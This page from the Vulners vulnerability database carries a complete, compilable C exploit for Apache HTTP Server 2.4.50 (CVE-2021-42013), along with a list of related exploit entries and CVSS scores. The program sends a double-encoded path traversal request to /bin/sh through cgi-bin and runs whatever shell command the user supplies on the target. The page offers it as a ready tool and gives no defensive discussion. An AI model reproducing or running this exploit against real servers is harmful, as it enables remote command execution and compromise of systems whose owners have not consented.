Vulners
Lucene search
Apache 2.4.50 Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 152 |
|---|---|---|---|---|
 | Exploit for Path Traversal in Apache Http_Server | 24 Jan 202616:34 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 17 Jun 202213:36 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 14 Mar 202204:08 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 26 Oct 202117:56 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 4 Apr 202222:07 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 18 Mar 202617:59 | – | githubexploit |
| Exploit for Files or Directories Accessible to External Parties in Apache Flink | 13 Oct 202117:03 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 15 Oct 202110:38 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 28 Oct 202511:45 | – | githubexploit |
| Exploit for Path Traversal in Apache Http_Server | 7 Oct 202118:31 | – | githubexploit |
10
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <curl/curl.h>
/* Apache 2.4.50 exploit (CVE-2021-42013)
* Author: Vilius Povilaika
* Website: www.povilaika.com */
// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013
int usage(char* prog)
{
printf("Usage: %s <host> <exec>\n", prog);
printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);
return 0;
}
bool error(const char* reason)
{
printf("[ERR] Critical error - %s\n", reason);
return false;
}
struct callback_result {
char* data;
size_t size;
};
static size_t callback(void* pointer, size_t size, size_t nmemb, void* data)
{
struct callback_result *memory = (struct callback_result *)data;
char* ptr = realloc(memory->data, memory->size+nmemb+1);
memory->data = ptr;
memcpy(&(memory->data[memory->size]), pointer, nmemb);
memory->size += nmemb;
memory->data[memory->size] = 0;
return nmemb;
}
bool exploit(void* result, char* host, char* exec)
{
CURL *curl = curl_easy_init();
char url[256];
sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);
curl_easy_setopt(curl, CURLOPT_URL, url);
char payload[256];
sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);
int res = curl_easy_perform(curl);
if (res != CURLE_OK)
return error(curl_easy_strerror(res));
curl_easy_cleanup(curl);
return true;
}
int main(int argc, char* argv[])
{
if (argc != 3)
return usage(argv[0]);
struct callback_result result = {0};
bool res = exploit(&result, argv[1], argv[2]);
if (res)
printf("[+] Exploit finished successfully, check output\n");
else
printf("[-] Exploit failed, check output\n");
printf(" \n%s\n", result.data);
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jun 2022 00:00Current
CVSS 27.5
CVSS 3.19.8
EPSS0.99964